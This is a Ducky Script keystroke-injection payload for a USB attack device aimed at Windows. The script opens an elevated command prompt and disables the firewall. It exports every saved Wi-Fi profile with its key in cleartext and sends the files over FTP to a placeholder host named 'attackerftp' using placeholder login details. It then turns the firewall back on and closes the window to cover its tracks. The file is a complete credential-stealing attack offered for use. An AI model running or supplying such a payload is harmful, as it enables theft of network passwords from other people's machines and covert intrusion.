ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 400
ENTER
DELAY 800
STRING netsh firewall set opmode disable
ENTER
DELAY 200
STRING cd C:\Windows\System32
ENTER
STRING netsh wlan export profile key=clear
ENTER
DELAY 200
STRING ftp
ENTER
STRING open attackerftp
ENTER
DELAY 400
STRING attackerusername
ENTER
DELAY 600
STRING attackerpassword
ENTER
STRING bin
ENTER
DELAY 200
STRING mput *.xml
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
STRING bye
ENTER
DELAY 200
STRING netsh firewall set opmode enable
ENTER
DELAY 200
ALT SPACE
STRING c
